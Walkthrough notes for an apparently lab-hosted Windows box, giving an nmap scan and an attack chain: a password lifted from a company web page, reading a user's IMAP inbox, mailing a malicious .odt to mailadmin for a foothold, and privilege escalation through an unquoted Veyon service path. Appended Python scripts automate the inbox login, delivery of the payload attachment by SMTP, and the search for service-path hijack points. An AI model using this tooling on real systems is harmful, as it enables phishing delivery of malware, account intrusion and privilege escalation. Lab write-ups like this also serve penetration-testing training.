Exploit
Host:
192.168.219.140
Nmap
Nmap scan report for 192.168.179.140
Host is up, received user-set (0.064s latency).
Scanned at 2024-07-24 19:35:46 IST for 626s
Not shown: 65513 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
25/tcp open smtp syn-ack ttl 125 Mercury/32 smtpd (Mail server account Maiser)
|_smtp-commands: localhost Hello nmap.scanme.org; ESMTPs are:, TIME
79/tcp open finger syn-ack ttl 125 Mercury/32 fingerd
| finger: Login: Admin Name: Mail System Administrator\x0D
| \x0D
|_[No profile information]\x0D
105/tcp open ph-addressbook syn-ack ttl 125 Mercury/32 PH addressbook server
106/tcp open pop3pw syn-ack ttl 125 Mercury/32 poppass service
110/tcp open pop3 syn-ack ttl 125 Mercury/32 pop3d
|_pop3-capabilities: UIDL TOP APOP EXPIRE(NEVER) USER
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
143/tcp open imap syn-ack ttl 125 Mercury/32 imapd 4.62
|_imap-capabilities: IMAP4rev1 OK CAPABILITY AUTH=PLAIN complete X-MERCURY-1A0001
443/tcp open ssl/http syn-ack ttl 125 Apache httpd 2.4.46
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.3.23
445/tcp open microsoft-ds? syn-ack ttl 125
2224/tcp open http syn-ack ttl 125 Mercury/32 httpd
|_http-title: Mercury HTTP Services
| http-methods:
|_ Supported Methods: GET HEAD
5040/tcp open unknown syn-ack ttl 125
8000/tcp open http syn-ack ttl 125 Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.3.23)
|_http-title: Time Travel Company Page
| http-methods:
| Supported Methods: POST OPTIONS HEAD GET TRACE
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.3.23
11100/tcp open vnc syn-ack ttl 125 VNC (protocol 3.8)
| vnc-info:
| Protocol version: 3.8
| Security types:
|_ Unknown security type (40)
20001/tcp open ftp syn-ack ttl 125 FileZilla ftpd 0.9.41 beta
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
|_ftp-bounce: bounce working!
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -r--r--r-- 1 ftp ftp 312 Oct 20 2020 .babelrc
| -r--r--r-- 1 ftp ftp 147 Oct 20 2020 .editorconfig
| -r--r--r-- 1 ftp ftp 23 Oct 20 2020 .eslintignore
| -r--r--r-- 1 ftp ftp 779 Oct 20 2020 .eslintrc.js
| -r--r--r-- 1 ftp ftp 167 Oct 20 2020 .gitignore
| -r--r--r-- 1 ftp ftp 228 Oct 20 2020 .postcssrc.js
| -r--r--r-- 1 ftp ftp 346 Oct 20 2020 .tern-project
| drwxr-xr-x 1 ftp ftp 0 Oct 20 2020 build
| drwxr-xr-x 1 ftp ftp 0 Oct 20 2020 config
| -r--r--r-- 1 ftp ftp 1376 Oct 20 2020 index.html
| -r--r--r-- 1 ftp ftp 425010 Oct 20 2020 package-lock.json
| -r--r--r-- 1 ftp ftp 2454 Oct 20 2020 package.json
| -r--r--r-- 1 ftp ftp 1100 Oct 20 2020 README.md
| drwxr-xr-x 1 ftp ftp 0 Oct 20 2020 src
| drwxr-xr-x 1 ftp ftp 0 Oct 20 2020 static
|_-r--r--r-- 1 ftp ftp 127 Oct 20 2020 _redirects
33006/tcp open unknown syn-ack ttl 125
| fingerprint-strings:
| NULL, SharpTV, TLSSessionReq, TerminalServer, ms-sql-s, pcworx:
|_ Host '192.168.45.181' is not allowed to connect to this MariaDB server
49664/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
UDP?
Got credentials for jonas from the company page on 8000/443: his one-line description on the page gave away the password (a cewl wordlist built from the same page would have caught it too).
Reading jonas's IMAP inbox (143/tcp, plain login) showed that we can send mail to mailadmin@localhost with a .odt attachment.
Built a .odt payload, mailed it to mailadmin@localhost and got access as Ela.
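The two mail steps above, as an added example that is not part of the original notes: read jonas's inbox over the Mercury/32 IMAP service and deliver a mail with a .odt attachment through the Mercury/32 smtpd on 25/tcp. The host, the password placeholder, the sender address and the subject/body text are assumptions, and `payload.odt` is whatever payload you built; nothing here comes from the target.

```python
#!/usr/bin/env python3
"""Added example (not from the original notes): list jonas's IMAP inbox and
send mailadmin@localhost a mail carrying a .odt attachment.
Host, credentials, sender and mail text are placeholders/assumptions."""
from __future__ import annotations

import email
import imaplib
import smtplib
from email.header import decode_header, make_header
from email.message import EmailMessage
from pathlib import Path

ODT_MAINTYPE, ODT_SUBTYPE = "application", "vnd.oasis.opendocument.text"


def list_inbox(host: str, user: str, password: str, port: int = 143) -> list[str]:
    """Plain-text IMAP login (AUTH=PLAIN was advertised); return 'From | Subject' per mail."""
    lines: list[str] = []
    with imaplib.IMAP4(host, port) as imap:
        imap.login(user, password)
        imap.select("INBOX", readonly=True)          # read-only: leave \Seen flags alone
        status, data = imap.search(None, "ALL")
        if status != "OK":
            return lines
        for num in data[0].split():
            status, parts = imap.fetch(num, "(BODY.PEEK[HEADER.FIELDS (FROM SUBJECT)])")
            if status != "OK" or not parts or not isinstance(parts[0], tuple):
                continue
            hdr = email.message_from_bytes(parts[0][1])
            subject = str(make_header(decode_header(hdr.get("Subject", ""))))
            lines.append(f"{hdr.get('From', '')} | {subject}")
    return lines


def build_odt_mail(sender: str, recipient: str, subject: str, body: str,
                   odt_bytes: bytes, filename: str = "report.odt") -> EmailMessage:
    """Multipart mail with the .odt attached under its proper OpenDocument MIME type."""
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = recipient
    msg["Subject"] = subject
    msg.set_content(body)
    msg.add_attachment(odt_bytes, maintype=ODT_MAINTYPE, subtype=ODT_SUBTYPE,
                       filename=filename)
    return msg


def attachment_summary(msg: EmailMessage) -> list[tuple[str, str, int]]:
    """(filename, content-type, size) of every attachment; eyeball this before sending."""
    return [(part.get_filename(), part.get_content_type(),
             len(part.get_payload(decode=True)))
            for part in msg.iter_attachments()]


def send_mail(host: str, msg: EmailMessage, port: int = 25) -> None:
    """Deliver through the smtpd on 25/tcp; the scan showed no auth requirement."""
    with smtplib.SMTP(host, port) as smtp:
        smtp.send_message(msg)


if __name__ == "__main__":
    HOST = "192.168.219.140"                      # lab host from the notes
    PASSWORD = "REDACTED"                         # assumption: jonas's password found earlier
    for line in list_inbox(HOST, "jonas", PASSWORD):
        print(line)
    payload = Path("payload.odt").read_bytes()    # the .odt you built
    mail = build_odt_mail("jonas@localhost", "mailadmin@localhost",
                          "Please review", "Attached as discussed.", payload)
    print(attachment_summary(mail))
    send_mail(HOST, mail)
```

`list_inbox` opens the mailbox read-only so the check leaves no trace in the \Seen flags, and `attachment_summary` lets you confirm the attachment went out as `application/vnd.oasis.opendocument.text` with the expected size rather than as a mislabelled octet-stream that the recipient's client might refuse to open.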
Privesc via the unquoted service path of the Veyon service (the VNC listener on 11100/tcp with the unknown security type is consistent with Veyon's default server port).
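The privesc step, as an added example that is not part of the original notes: given `sc qc <service>` output, work out whether the image path is unquoted and which files Windows would try to execute first, which are the places to plant a binary. The `sc qc` sample is constructed; the service name, install path and account are assumed to resemble a default Veyon install and were not taken from the target, so run `sc qc` on the box and feed that in.

```python
#!/usr/bin/env python3
"""Added example (not from the original notes): unquoted service path triage.
Parses `sc qc` output and lists the lookup candidates CreateProcess tries for an
unquoted path with spaces. SAMPLE_SC_QC is constructed; the Veyon path/account
in it are assumptions, not values read from the target."""
from __future__ import annotations

import re

SAMPLE_SC_QC = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: VeyonService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Veyon\veyon-service.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Veyon Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""


def parse_sc_qc(text: str) -> dict[str, str]:
    """Pull the fields that matter out of `sc qc <service>` output."""
    fields: dict[str, str] = {}
    m = re.search(r"SERVICE_NAME:\s*(\S+)", text)
    if m:
        fields["name"] = m.group(1)
    for key in ("START_TYPE", "BINARY_PATH_NAME", "SERVICE_START_NAME"):
        m = re.search(rf"{key}\s*:\s*(.*)", text)
        if m:
            fields[key] = m.group(1).strip()
    return fields


def unquoted_candidates(image_path: str) -> list[str]:
    """Executables CreateProcess tries, in order, for an unquoted image path.

    Mirrors the documented lookup: each space-delimited prefix is tried, '.exe'
    is appended when the prefix has no extension, and the search stops at the
    first prefix that is the real .exe. A quoted path yields nothing."""
    path = image_path.strip()
    if not path or path.startswith('"'):
        return []
    tokens = path.split(" ")
    tried: list[str] = []
    for i in range(1, len(tokens) + 1):
        raw = " ".join(tokens[:i])
        last_component = raw.rsplit("\\", 1)[-1]
        tried.append(raw if "." in last_component else raw + ".exe")
        if raw.lower().endswith(".exe"):
            break                                # reached the real binary; rest is arguments
    return tried


def hijack_points(image_path: str) -> list[str]:
    """Paths tried before the real binary: drop a payload at any one you can write."""
    return unquoted_candidates(image_path)[:-1]


def report(sc_qc_text: str) -> dict:
    """Summarise one service: what runs, as whom, how it starts, and where to hijack."""
    f = parse_sc_qc(sc_qc_text)
    points = hijack_points(f.get("BINARY_PATH_NAME", ""))
    return {
        "service": f.get("name"),
        "runs_as": f.get("SERVICE_START_NAME"),
        "start": f.get("START_TYPE"),
        "hijack_points": points,
        "vulnerable": bool(points),
    }


if __name__ == "__main__":
    for k, v in report(SAMPLE_SC_QC).items():
        print(f"{k}: {v}")
```

`hijack_points` only tells you where a binary would be picked up; whether the box is actually exploitable depends on the next two checks, which have to be run on the target: `icacls` on each candidate's parent directory (for the sample, `C:\` and `C:\Program Files`) to see whether your user can create files there, and whether you can restart the service or trigger a reboot, since an AUTO_START service only re-reads its path on start.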